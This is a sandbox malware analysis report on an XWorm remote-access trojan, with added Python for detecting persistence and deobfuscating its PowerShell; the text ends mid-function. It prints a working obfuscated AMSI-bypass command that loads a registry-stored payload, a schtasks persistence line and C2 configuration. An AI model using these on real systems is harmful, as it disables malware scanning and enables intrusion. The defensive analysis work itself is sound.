Windows Analysis Report
aoKTzGQSRP.exe

Overview

General Information

Sample name: aoKTzGQSRP.exe (renamed because the original name is a hash value)
Original sample name: 202cb1021a1db9bd59a642ebee781bbafe284faf3fe1ba8e0ed1d89b3878ddbf.exe
Analysis ID: 1539526
MD5: 86357c1fffbe566da1d9903ab765f921
SHA1: 1d55db2dd9e556ff066e297273e402130adf515f
SHA256: 202cb1021a1db9bd59a642ebee781bbafe284faf3fe1ba8e0ed1d89b3878ddbf
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Drops PE files to the user root directory
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Process Tree

  • System is w10x64
  • aoKTzGQSRP.exe (PID: 5228 cmdline: "C:\Users\user\Desktop\aoKTzGQSRP.exe" MD5: 86357C1FFFBE566DA1D9903AB765F921)
    • CMaker 2.0.exe (PID: 4800 cmdline: "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe" MD5: CC32561980C2400C490A4849C78E38ED)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • CMaker 2.0.exe (PID: 1136 cmdline: "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe" MD5: CC32561980C2400C490A4849C78E38ED)
    • 1.exe (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Temp\1.exe" MD5: E1C82191B678CEA8F3C996887DDC1232)
      • DeadXClient.exe (PID: 6684 cmdline: "C:\Users\Public\DeadXClient.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
        • schtasks.exe (PID: 7000 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • DeadROOTkit.exe (PID: 4188 cmdline: "C:\Users\Public\DeadROOTkit.exe" MD5: 7DD98FC2976EE270A278E1A9A28EEFAE)
        • WerFault.exe (PID: 4976 cmdline: C:\Windows\system32\WerFault.exe -u -p 4188 -s 1660 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • DeadCodeRootKit.exe (PID: 6704 cmdline: "C:\Users\Public\DeadCodeRootKit.exe" MD5: B8479A23C22CF6FC456E197939284069)
  • powershell.exe (PID: 5000 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BQVbDmmpYciFvEPZCVf=PwejfaSCJJDP @([String])([IntPtr]);$EAvMyVuYpliIybTRzMjsOI=PwejfaSCJJDP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JZLeUIgnxFO=$mHgtxYLbOzoJe.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$yudsyoexNPPoGc=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$JZLeUIgnxFO,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dL'+'i'+''+[Char](98)+''+'r'+''+'a'+'r'+'y'+''+[Char](65)+'')));$WIJhlFbJQceUyrYdX=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$JZLeUIgnxFO,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+'r'+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$SWLVYEp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yudsyoexNPPoGc,$BQVbDmmpYciFvEPZCVf).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$xjZyvNWKEgRcmEMjl=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$SWLVYEp,[Object]('Am'+[Char](115)+''+'i'+''+'S'+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$gRxCzystuh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WIJhlFbJQceUyrYdX,$EAvMyVuYpliIybTRzMjsOI).Invoke($xjZyvNWKEgRcmEMjl,[uint32]8,4,[ref]$gRxCzystuh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xjZyvNWKEgRcmEMjl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WIJhlFbJQceUyrYdX,$EAvMyVuYpliIybTRzMjsOI).Invoke($xjZyvNWKEgRcmEMjl,[uint32]8,0x20,[ref]$gRxCzystuh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('Dead'+'s'+''+[Char](116)+''+[Char](97)+'ger')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 5644 cmdline: C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 60 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 980 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1140 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1192 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1248 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1328 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1448 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1516 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1560 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1640 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1648 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1784 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • WMIADAP.exe (PID: 1804 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • svchost.exe (PID: 6288 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 1020 cmdline: C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • Deadsvchost.exe (PID: 1804 cmdline: C:\Users\Public\Deadsvchost.exe MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
  • Deadsvchost.exe (PID: 1020 cmdline: "C:\Users\Public\Deadsvchost.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
  • Deadsvchost.exe (PID: 4152 cmdline: "C:\Users\Public\Deadsvchost.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
  • cleanup
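The tree above shows DeadXClient.exe (PID 6684) anchoring itself three ways: a scheduled task that re-runs C:\Users\Public\Deadsvchost.exe every minute and asks for /RL HIGHEST, an HKCU Run value of the same name, and a Deadsvchost.lnk in the user's Startup folder (the last two appear as Sigma matches in the System Summary below); the three later Deadsvchost.exe entries are that task firing. The Python below is an added example, not part of this Joe Sandbox report or the sample. It applies those same checks to a handful of constructed Sysmon-style events (IDs 1, 11 and 13, modelled on the entries in this report plus one benign vendor task) so it runs offline; the directory list, the event field names and the finding labels are assumptions chosen for the example.

```python
import re

# Directories a dropper favours because any user can write there (assumption for
# this example; extend to taste).
USER_WRITABLE_DIRS = (
    r"c:\users\public",
    r"\appdata\local\temp",
    r"\appdata\roaming",
    r"c:\programdata",
    r"c:\windows\temp",
)
RUN_KEYS = (r"\currentversion\run", r"\currentversion\runonce")
STARTUP_DIR = r"\start menu\programs\startup"


def in_user_writable_dir(path):
    """True if a (possibly quoted) Windows path lies under a user-writable directory."""
    p = path.strip('"').lower()
    return any(d in p for d in USER_WRITABLE_DIRS)


def parse_schtasks(cmdline):
    """Map schtasks switches to their values: {'/create': True, '/sc': 'minute', '/tr': ...}."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    opts, i = {}, 0
    while i < len(tokens):
        tok = tokens[i].lower()
        if tok.startswith("/") and i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
            opts[tok] = tokens[i + 1]   # switch with an argument, e.g. /tr <path>
            i += 2
        else:
            opts[tok] = True            # bare switch such as /create or /f
            i += 1
    return opts


def evaluate(events):
    """Return (finding, detail) pairs for the persistence behaviours recorded in the report."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1:                                   # process creation
            image, cmd = ev.get("Image", ""), ev.get("CommandLine", "")
            if in_user_writable_dir(image):
                findings.append(("exec_from_suspicious_folder", image))
            if image.lower().endswith(r"\schtasks.exe"):
                o = parse_schtasks(cmd)
                if "/create" in o:
                    action, reasons = str(o.get("/tr", "")), []
                    if in_user_writable_dir(action):
                        reasons.append("task action in user-writable directory")
                    if str(o.get("/sc", "")).lower() == "minute":
                        reasons.append("re-runs every %s minute(s)" % o.get("/mo", "1"))
                    if str(o.get("/rl", "")).upper() == "HIGHEST":
                        reasons.append("/RL HIGHEST requested")
                    if reasons:
                        findings.append(("scheduled_task_persistence",
                                         "%s -> %s: %s" % (o.get("/tn"), action, "; ".join(reasons))))
        elif eid == 13:                                # registry value set
            key, value = ev.get("TargetObject", ""), str(ev.get("Details", ""))
            if any(k in key.lower() for k in RUN_KEYS) and in_user_writable_dir(value):
                findings.append(("run_key_persistence", "%s = %s" % (key, value)))
        elif eid == 11:                                # file created
            target = ev.get("TargetFilename", "")
            if STARTUP_DIR in target.lower():
                findings.append(("startup_folder_persistence", target))
    return findings


# Constructed events modelled on this report's process tree and Sigma matches
# (not a real log export); the last one is a benign daily task that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\Public\DeadXClient.exe",
     "CommandLine": r'"C:\Users\Public\DeadXClient.exe"',
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\1.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
                    r'/tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"',
     "ParentImage": r"C:\Users\Public\DeadXClient.exe"},
    {"EventID": 13, "Image": r"C:\Users\Public\DeadXClient.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deadsvchost",
     "Details": r"C:\Users\Public\Deadsvchost.exe"},
    {"EventID": 11, "Image": r"C:\Users\Public\DeadXClient.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /create /tn "VendorUpdate" /sc daily /st 03:00 '
                    r'/tr "C:\Program Files\Vendor\update.exe"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
]

if __name__ == "__main__":
    for kind, detail in evaluate(SAMPLE_EVENTS):
        print("%-28s %s" % (kind, detail))
```

Run as-is it reports four findings (execution from C:\Users\Public, the one-minute HIGHEST task, the Run value and the Startup .lnk) and nothing for the vendor task; the same functions can be fed a parsed Sysmon export.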

Malware Configuration

{"C2 url": ["updates-full.gl.at.ply.gg"], "Port": "60075", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.0"}
Source | Rule | Description | Author | Strings
C:\Users\Public\DeadROOTkit.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\Public\DeadROOTkit.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\Public\DeadROOTkit.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
C:\Users\Public\DeadROOTkit.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x888a:$s6: VirtualBox
  • 0x87e8:$s8: Win32_ComputerSystem
  • 0x91f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9293:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x93a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8d52:$cnc4: POST / HTTP/1.1
C:\Users\Public\Deadsvchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7332:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x73cf:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x74e4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x716e:$cnc4: POST / HTTP/1.1
00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x868a:$s6: VirtualBox
  • 0x85e8:$s8: Win32_ComputerSystem
  • 0x8ff6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9093:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x91a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8b52:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
7.0.DeadROOTkit.exe.dd0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
7.0.DeadROOTkit.exe.dd0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
7.0.DeadROOTkit.exe.dd0000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
7.0.DeadROOTkit.exe.dd0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x888a:$s6: VirtualBox
  • 0x87e8:$s8: Win32_ComputerSystem
  • 0x91f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9293:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x93a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8d52:$cnc4: POST / HTTP/1.1
4.2.1.exe.2ff5330.2.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
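The powershell.exe entry in the process tree above (PID 5000, the same command that drives the PowerShell obfuscation and WinAPI-via-command-line Sigma matches in the System Summary that follows) hides every API name behind 'a'+[Char](98)+'c' concatenation. Read back, it is the familiar reflective-delegate pattern: it resolves GetModuleHandle and GetProcAddress through Microsoft.Win32.UnsafeNativeMethods, loads amsi.dll with LoadLibraryA, makes the first 8 bytes of AmsiScanBuffer writable with VirtualProtect (protection 4, PAGE_READWRITE), writes the six bytes B8 57 00 07 80 C3 (mov eax, 0x80070057 ; ret, so every scan returns E_INVALIDARG and is treated as no detection), restores protection 0x20 (PAGE_EXECUTE_READ), and finally loads and runs a .NET assembly stored as the value Deadstager under HKLM\SOFTWARE, which is what the "Stores large binary data to the registry" signature refers to. The Python below is an added example, not code from the report or the sample: it folds those concatenation chains back into plain strings, decodes the patch bytes and pulls out the registry location, run against a constructed, shortened excerpt of that command line (variable names abbreviated, the string chains copied as they appear).

```python
import re

TOKEN = r"(?:'[^']*'|\[Char\]\(\d+\))"
CHAIN = re.compile(TOKEN + r"(?:\s*\+\s*" + TOKEN + r")*")      # 'a'+[Char](98)+''+'c' ...
PIECE = re.compile(r"'([^']*)'|\[Char\]\((\d+)\)")
PATCH = re.compile(r"\[Byte\[\]\]\(([^)]*)\)")                    # [Byte[]](0xb8,0x57,...)
REG_LOAD = re.compile(r"OpenSubkey\('([^']*)'\)\.GetValue\('([^']*)'\)")
E_INVALIDARG = 0x80070057


def _fold(match):
    # Concatenate the pieces of one chain: literal text as-is, [Char](n) as chr(n).
    parts = [chr(int(code)) if code else lit for lit, code in PIECE.findall(match.group(0))]
    return "'" + "".join(parts) + "'"


def deobfuscate(cmd):
    """Collapse every literal/[Char] concatenation chain into a single quoted string."""
    return CHAIN.sub(_fold, cmd)


def recovered_strings(cmd, min_len=4):
    """All string literals of at least min_len characters once the chains are folded."""
    return [s for s in re.findall(r"'([^']*)'", deobfuscate(cmd)) if len(s) >= min_len]


def decode_patch(cmd):
    """Extract the byte array handed to Marshal.Copy and decode it when it is the
    6-byte 'mov eax, <HRESULT> ; ret' stub used to neuter AmsiScanBuffer."""
    m = PATCH.search(cmd)
    if not m:
        return None
    buf = bytes(int(x, 0) for x in m.group(1).split(","))
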